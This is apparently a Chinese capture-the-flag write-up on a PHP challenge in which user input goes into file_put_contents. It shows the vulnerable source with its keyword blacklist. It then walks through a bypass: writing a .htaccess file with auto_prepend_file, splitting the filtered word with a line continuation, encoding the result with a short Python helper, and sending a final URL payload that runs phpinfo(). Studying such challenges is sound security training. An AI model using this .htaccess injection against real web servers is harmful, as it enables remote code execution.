file_put_contents
php代码审计
题目给出php源码进行代码审计
<?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nHello, world");
?>每次都会将当前目录下index.php以外的文件删除,传入的content不能包含on html type flag upload file,文件名只能为小写字母和.
试了传index.php不行
那么使用.htaccess作为文件名传参
php_value auto_prepend_file
.htaccess
#<?php phpinfo();?>
因为file关键字被过滤以及需要转义后面的\nHello,world,所以构造payload,因为本机为mac,所以换行符编码为%0A,需要替换为%0D%0A
php_value auto_prepend_fi\
le .htaccess
#<?php phpinfo();?>
#\
python代码为
from urllib.parse import quote
with open('a.txt', 'r') as f:
content = f.read().strip()
print(quote(content).replace('%0A', '%0D%0A'))最终payload为
?filename=.htaccess&content=php_value%20auto_prepend_fi%5C%0D%0Ale%20.htaccess%0D%0A%23%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%0D%0A%23%5C
